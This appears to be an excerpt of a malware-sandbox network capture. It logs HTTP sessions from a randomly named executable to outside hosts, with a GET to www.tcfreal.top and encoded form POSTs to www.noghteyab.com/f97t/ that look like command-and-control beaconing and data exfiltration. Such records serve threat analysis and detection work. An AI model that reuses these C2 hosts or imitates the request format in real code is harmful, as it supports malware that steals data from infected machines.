Jul 27, 2024 08:06:40.286432981 CEST	1236	IN	Data Raw: 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6c 69 67 68 74 62 6f 78 2f 63 73 73 2f 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 Data Ascii: rel="stylesheet"> <link href="lib/lightbox/css/lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link h
Jul 27, 2024 08:06:40.286446095 CEST	1236	IN	Data Raw: 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76 62 61 72 43 6f 6c 6c 61 70 73 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 62 61 72 73 22 3e 3c 2f 73 70 61 Data Ascii: a-bs-target="#navbarCollapse"> <span class="fa fa-bars"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-
Jul 27, 2024 08:06:40.286457062 CEST	1236	IN	Data Raw: 6b 22 3e 43 6f 6e 74 61 63 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 22 20 63 6c 61 73 73 3d 22 Data Ascii: k">Contact</a> </div> <a href="" class="btn rounded-pill py-2 px-4 ms-3 d-none d-lg-block">Get Started</a> </div> </nav> <div class="container-xxl py-5 bg-p
Jul 27, 2024 08:06:40.286469936 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 4e 61 76 62 61 72 20 26 20 48 65 72 6f 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: </div> </div> ... Navbar & Hero End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container px-lg-5 text-center">
Jul 27, 2024 08:06:40.286480904 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22 3e 41 64 64 72 65 73 73 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0d 0a 20 20 20 20 Data Ascii: <p class="section-title text-white h5 mb-4">Address<span></span></p> <p><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p><i class="fa fa-phone-alt me-3"></i>+01
Jul 27, 2024 08:06:40.286494970 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 22 3e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <a class="btn btn-link" href="">Privacy Policy</a> <a class="btn btn-link" href="">Terms & Condition</a> <a class="btn btn-link" href="">Career</a> </div>
Jul 27, 2024 08:06:40.286504984 CEST	108	IN	Data Raw: 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 20 73 72 63 3d 22 69 6d 67 2f 70 6f 72 74 66 6f 6c 69 6f 2d 35 2e 6a 70 67 22 20 61 6c 74 3d 22 49 6d 61 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: lass="img-fluid" src="img/portfolio-5.jpg" alt="Image"> </div>
Jul 27, 2024 08:06:40.286777020 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d Data Ascii: <div class="col-4"> <img class="img-fluid" src="img/portfolio-6.jpg" alt="Image"> </div> </div> </div>
Jul 27, 2024 08:06:40.286884069 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 63 6f 70 79 3b 20 3c 61 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 22 20 68 72 65 66 3d 22 23 22 3e 59 6f 75 72 20 53 69 74 65 20 4e 61 6d 65 3c 2f 61 3e 2c 20 41 6c 6c 20 52 Data Ascii: © <a class="border-bottom" href="#">Your Site Name</a>, All Right Reserved. .../*** This template is free as long as you keep the footer authors credit link/attribution link/backlink. If you'd like to
Jul 27, 2024 08:06:40.287015915 CEST	748	IN	Data Raw: 6f 77 2d 75 70 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 69 65 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d Data Ascii: ow-up"></i></a> </div> ... JavaScript Libraries --> <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	62396	203.161.50.128	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:42.362745047 CEST	483	OUT	GET /sg27/?9Fjx=cpYt0YSQq6qumPKnLg+mC8LQzbjhCfVjUwEln5zritMpGV/+kM1tERFpp4gfmVNp46bstuO0H+g7H2/quwpl6ls6SEGImodBdGoSGHjCZU2G7An66QSlhEKUMH7zQGocUjr8wdY=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.tcfreal.top User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:06:42.960786104 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 06:06:42 GMT Server: Apache Content-Length: 11834 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" r [TRUNCATED]
Jul 27, 2024 08:06:42.960865021 CEST	1236	IN	Data Raw: 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6c 69 67 68 74 62 6f 78 2f 63 73 73 2f 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 Data Ascii: rousel.min.css" rel="stylesheet"> <link href="lib/lightbox/css/lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet -
Jul 27, 2024 08:06:42.960876942 CEST	1236	IN	Data Raw: 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76 62 61 72 43 6f 6c 6c 61 70 73 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 Data Ascii: ="collapse" data-bs-target="#navbarCollapse"> <span class="fa fa-bars"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-
Jul 27, 2024 08:06:42.960887909 CEST	1236	IN	Data Raw: 61 76 2d 69 74 65 6d 20 6e 61 76 2d 6c 69 6e 6b 22 3e 43 6f 6e 74 61 63 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 Data Ascii: av-item nav-link">Contact</a> </div> <a href="" class="btn rounded-pill py-2 px-4 ms-3 d-none d-lg-block">Get Started</a> </div> </nav> <div class="containe
Jul 27, 2024 08:06:42.960907936 CEST	1236	IN	Data Raw: 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 4e 61 76 62 61 72 20 26 20 48 65 72 6f 20 45 6e 64 20 2d 2d Data Ascii: </div> </div> </div> ... Navbar & Hero End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container px-lg-5 text-ce
Jul 27, 2024 08:06:42.960918903 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22 3e 41 64 64 72 65 73 73 3c 73 70 61 6e 3e 3c 2f Data Ascii: <p class="section-title text-white h5 mb-4">Address<span></span></p> <p><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p><i class="fa fa-phone-al
Jul 27, 2024 08:06:42.960931063 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 22 3e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 Data Ascii: <a class="btn btn-link" href="">Privacy Policy</a> <a class="btn btn-link" href="">Terms & Condition</a> <a class="btn btn-link" href="">Career</a> <
Jul 27, 2024 08:06:42.960942030 CEST	108	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 22 20 73 72 63 3d 22 69 6d 67 2f 70 6f 72 74 66 6f 6c 69 6f 2d 35 2e 6a 70 67 22 20 61 6c 74 3d 22 49 6d 61 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: <img class="img-fluid" src="img/portfolio-5.jpg" alt="Image"> </div>
Jul 27, 2024 08:06:42.961246967 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: <div class="col-4"> <img class="img-fluid" src="img/portfolio-6.jpg" alt="Image"> </div> </div> </div>
Jul 27, 2024 08:06:42.961308956 CEST	1236	IN	Data Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 63 6f 70 79 3b 20 3c 61 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 22 20 68 72 65 66 3d 22 23 22 3e 59 6f 75 72 20 53 69 74 65 20 Data Ascii: > © <a class="border-bottom" href="#">Your Site Name</a>, All Right Reserved. .../*** This template is free as long as you keep the footer authors credit link/attribution link/backlink. I
Jul 27, 2024 08:06:42.961613894 CEST	763	IN	Data Raw: 6c 61 73 73 3d 22 62 69 20 62 69 2d 61 72 72 6f 77 2d 75 70 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 69 65 73 20 2d 2d 3e 0d 0a 20 Data Ascii: lass="bi bi-arrow-up"></i></a> </div> ... JavaScript Libraries --> <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.mi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	62397	51.89.93.192	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:48.143526077 CEST	747	OUT	POST /f97t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.noghteyab.com Origin: http://www.noghteyab.com Referer: http://www.noghteyab.com/f97t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 73 6d 41 73 67 51 58 4a 31 55 35 34 79 58 38 74 64 39 4a 4d 73 77 6e 69 74 4e 51 6b 72 68 44 46 61 52 50 55 51 50 47 43 61 78 39 69 68 73 78 47 71 4a 5a 41 32 6e 59 38 4c 78 62 58 6d 6b 54 55 6c 4a 7a 48 50 76 2f 46 44 6f 4e 30 73 51 61 4d 70 42 75 50 47 2b 6f 78 30 53 42 38 30 69 38 53 64 45 75 42 61 6f 49 62 47 4b 53 61 4f 6b 34 77 44 41 2f 4b 32 6e 4d 56 5a 79 67 32 49 35 41 31 52 70 37 74 4e 52 49 6a 64 2f 4c 32 58 75 6d 44 4a 69 4b 77 37 34 4e 78 55 5a 4c 56 2f 62 35 4d 71 56 71 73 34 4a 7a 46 57 65 2f 4e 36 44 31 6e 52 53 6f 51 78 47 44 6b 46 4a 55 50 44 38 37 2f 79 70 50 50 74 2f 69 73 32 6b 2b 61 Data Ascii: 9Fjx=smAsgQXJ1U54yX8td9JMswnitNQkrhDFaRPUQPGCax9ihsxGqJZA2nY8LxbXmkTUlJzHPv/FDoN0sQaMpBuPG+ox0SB80i8SdEuBaoIbGKSaOk4wDA/K2nMVZyg2I5A1Rp7tNRIjd/L2XumDJiKw74NxUZLV/b5MqVqs4JzFWe/N6D1nRSoQxGDkFJUPD87/ypPPt/is2k+a
Jul 27, 2024 08:06:48.988352060 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 06:06:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gntq6detk894cr9mqcqdh2dd8r; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Encoding: gzip Data Raw: 35 35 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cb 6e dc 36 14 5d 8f bf 82 d5 a2 6e 81 99 91 9d 47 e3 26 d2 18 79 d8 40 8a 20 8b bc 80 ae 0a 8e c4 19 d1 a6 48 99 a4 66 a2 2f e8 1f b4 9b a2 bb a2 40 d1 2e ba eb 3e bf 52 04 fd 8c 9e 4b 4a f3 08 9c 20 80 07 06 86 23 dd 7b ee bd e7 be e8 83 ac f2 b5 9a 1d 64 95 e0 e5 ec 60 94 79 e9 95 98 3d 31 35 97 9a bd 6c 5d 23 b4 93 46 67 69 7c 01 89 5a 78 ce 2a ef 9b 89 b8 6a e5 2a 4f 1e 1b ed 85 f6 93 57 5d 23 12 56 c4 5f 79 e2 c5 5b 9f 12 fa 03 56 54 dc 3a e1 f3 d6 2f 26 27 09 99 51 52 5f b2 ca 8a 45 7e 48 50 ee 7e 9a 2e a0 e8 a6 4b 63 96 4a f0 46 ba 69 61 ea b4 70 ee 74 c1 6b a9 ba fc 85 99 1b 6f ee df 39 3a 1a df 3e 3a 3a 64 56 a8 fc d0 f9 4e 09 57 09 e1 0f 99 87 fd fc 30 98 85 da 21 cc 0c 86 48 34 d9 8a 26 d1 72 52 72 cf d3 f8 38 7e 4d a1 b7 75 ef 33 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ec 58 a1 b8 73 60 80 cf 95 98 ac 2d 6f 1a 61 03 ae 2b ac 6c 3c 73 b6 c8 93 21 ee f5 7a dd 47 1d 22 b6 a2 e0 8d 07 63 29 48 98 5e b8 d3 4a e5 42 27 b3 2c 8d ca b3 83 83 ac 94 ab [TRUNCATED] Data Ascii: 555Wn6]nG&y@ Hf/@.>RKJ #{d`y=15l]#Fgi\|ZxjOW]#V_y[VT:/&'QR_E~HP~.KcJFiaptko9:>::dVNW0!H4&rRr8~Mu3YXs`-oa+l<s!zG"c)H^JB',}P72,'q#r%@`4`Qv'(<^2-/H/O#<cqd}1a'r,"9+OfYyyd=[qrJK#v>tzPgwsn[zXgOD]qS_/(??Zlyq?bJqSU@}T4KXMH\;4;1S:nixykB,(jRGs+?Tp/QeZxx9djqS[ucDLdc0.YgZ\|3v4.%#MN<dWzk(XSi;cb=@1b`!apDAQ`YDxHQ;p2.x\|sSRB2d`<;F
Jul 27, 2024 08:06:48.988374949 CEST	507	IN	Data Raw: 19 dd 32 17 18 d7 86 29 83 68 2d 72 e6 8c 5a 09 d8 38 47 28 81 ff 3e 35 30 61 b0 38 c8 06 65 b9 17 64 9a 6a 4c a9 6e cc 1a 2c 4a 27 06 3f 3e 9a ba 6d aa 7a e0 21 63 03 ac 00 3a 45 b1 47 4a 24 15 3e 10 2e ba 69 81 ec 41 0e 4b 19 66 fb b0 f7 14 80 Data Ascii: 2)h-rZ8G(>50a8edjLn,J'?>mz!c:EGJ$>.iAKfZ !#V;Q[)5U!VQq0!hY/HQm~m!$Qz<;aWhfi##owWi3!]?X)]x2A8j9ecFO4,.K$20oG(`+J.)$ ,[/lp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	62398	51.89.93.192	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:50.709055901 CEST	771	OUT	POST /f97t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.noghteyab.com Origin: http://www.noghteyab.com Referer: http://www.noghteyab.com/f97t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 73 6d 41 73 67 51 58 4a 31 55 35 34 77 30 6b 74 4f 65 68 4d 35 67 6e 68 7a 64 51 6b 6c 42 44 42 61 52 7a 55 51 4b 2b 53 61 43 56 69 68 49 39 47 6c 6f 5a 41 31 6e 59 38 46 52 62 53 34 55 53 61 6c 4a 2f 35 50 72 37 46 44 6f 78 30 73 56 65 4d 70 79 48 5a 48 75 6f 7a 38 79 42 2b 77 69 38 53 64 45 75 42 61 6f 63 6c 47 4f 47 61 4f 31 49 77 44 6c 4c 4a 2f 48 4d 57 50 69 67 32 4d 35 41 78 52 70 37 50 4e 51 45 4e 64 38 7a 32 58 71 69 44 4f 32 2b 76 78 34 4e 33 65 35 4b 31 7a 4b 6f 77 6b 6b 72 31 38 59 33 37 4f 66 6e 37 37 31 30 39 4e 68 6f 7a 6a 57 6a 6d 46 4c 4d 39 44 63 37 56 77 70 33 50 2f 6f 75 4c 35 51 62 35 35 6d 55 41 53 6f 33 55 4e 57 4b 49 6d 45 70 55 67 77 2f 66 38 77 3d 3d Data Ascii: 9Fjx=smAsgQXJ1U54w0ktOehM5gnhzdQklBDBaRzUQK+SaCVihI9GloZA1nY8FRbS4USalJ/5Pr7FDox0sVeMpyHZHuoz8yB+wi8SdEuBaoclGOGaO1IwDlLJ/HMWPig2M5AxRp7PNQENd8z2XqiDO2+vx4N3e5K1zKowkkr18Y37Ofn77109NhozjWjmFLM9Dc7Vwp3P/ouL5Qb55mUASo3UNWKImEpUgw/f8w==
Jul 27, 2024 08:06:51.335567951 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 06:06:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=58k37l9bluh2ujh818qksgef47; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Encoding: gzip Data Raw: 35 35 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cb 6e dc 36 14 5d 8f bf 82 d5 a2 6e 81 99 91 9d 47 e3 26 d2 18 79 d8 40 8a 20 8b bc 80 ae 0a 8e c4 19 d1 a6 48 99 a4 66 a2 2f e8 1f b4 9b a2 bb a2 40 d1 2e ba eb 3e bf 52 04 fd 8c 9e 4b 4a f3 08 9c 20 80 07 06 86 23 dd 7b ee bd e7 be e8 83 ac f2 b5 9a 1d 64 95 e0 e5 ec 60 94 79 e9 95 98 3d 31 35 97 9a bd 6c 5d 23 b4 93 46 67 69 7c 01 89 5a 78 ce 2a ef 9b 89 b8 6a e5 2a 4f 1e 1b ed 85 f6 93 57 5d 23 12 56 c4 5f 79 e2 c5 5b 9f 12 fa 03 56 54 dc 3a e1 f3 d6 2f 26 27 09 99 51 52 5f b2 ca 8a 45 7e 48 50 ee 7e 9a 2e a0 e8 a6 4b 63 96 4a f0 46 ba 69 61 ea b4 70 ee 74 c1 6b a9 ba fc 85 99 1b 6f ee df 39 3a 1a df 3e 3a 3a 64 56 a8 fc d0 f9 4e 09 57 09 e1 0f 99 87 fd fc 30 98 85 da 21 cc 0c 86 48 34 d9 8a 26 d1 72 52 72 cf d3 f8 38 7e 4d a1 b7 75 ef 33 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ec 58 a1 b8 73 60 80 cf 95 98 ac 2d 6f 1a 61 03 ae 2b ac 6c 3c 73 b6 c8 93 21 ee f5 7a dd 47 1d 22 b6 a2 e0 8d 07 63 29 48 98 5e b8 d3 4a e5 42 27 b3 2c 8d ca b3 83 83 ac 94 ab [TRUNCATED] Data Ascii: 555Wn6]nG&y@ Hf/@.>RKJ #{d`y=15l]#Fgi\|ZxjOW]#V_y[VT:/&'QR_E~HP~.KcJFiaptko9:>::dVNW0!H4&rRr8~Mu3YXs`-oa+l<s!zG"c)H^JB',}P72,'q#r%@`4`Qv'(<^2-/H/O#<cqd}1a'r,"9+OfYyyd=[qrJK#v>tzPgwsn[zXgOD]qS_/(??Zlyq?bJqSU@}T4KXMH\;4;1S:nixykB,(jRGs+?Tp/QeZxx9djqS[ucDLdc0.YgZ\|3v4.%#MN<dWzk(XSi;cb=@1b`!apDAQ`YDxHQ;p2.x\|sSRB2d`<;F
Jul 27, 2024 08:06:51.335592031 CEST	507	IN	Data Raw: 19 dd 32 17 18 d7 86 29 83 68 2d 72 e6 8c 5a 09 d8 38 47 28 81 ff 3e 35 30 61 b0 38 c8 06 65 b9 17 64 9a 6a 4c a9 6e cc 1a 2c 4a 27 06 3f 3e 9a ba 6d aa 7a e0 21 63 03 ac 00 3a 45 b1 47 4a 24 15 3e 10 2e ba 69 81 ec 41 0e 4b 19 66 fb b0 f7 14 80 Data Ascii: 2)h-rZ8G(>50a8edjLn,J'?>mz!c:EGJ$>.iAKfZ !#V;Q[)5U!VQq0!hY/HQm~m!$Qz<;aWhfi##owWi3!]?X)]x2A8j9ecFO4,.K$20oG(`+J.)$ ,[/lp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	62399	51.89.93.192	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:53.284519911 CEST	1784	OUT	POST /f97t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.noghteyab.com Origin: http://www.noghteyab.com Referer: http://www.noghteyab.com/f97t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 73 6d 41 73 67 51 58 4a 31 55 35 34 77 30 6b 74 4f 65 68 4d 35 67 6e 68 7a 64 51 6b 6c 42 44 42 61 52 7a 55 51 4b 2b 53 61 45 4e 69 68 37 31 47 6b 50 4e 41 30 6e 59 38 4e 78 62 54 34 55 54 47 6c 4b 50 39 50 75 69 77 44 75 31 30 75 33 57 4d 67 6a 48 5a 4a 75 6f 7a 77 53 42 2f 30 69 38 48 64 45 2b 46 61 6f 4d 6c 47 4f 47 61 4f 33 41 77 42 77 2f 4a 35 48 4d 56 5a 79 67 79 49 35 41 64 52 70 53 77 4e 51 51 7a 64 74 54 32 58 4f 47 44 4c 46 57 76 73 6f 4e 31 5a 35 4b 58 7a 4b 6b 56 6b 6b 33 44 38 59 44 56 4f 64 37 37 32 43 5a 4a 55 52 77 6b 79 57 43 41 63 35 55 4e 62 35 62 48 38 61 72 77 38 49 6d 4d 33 6a 58 4c 31 78 6b 4d 65 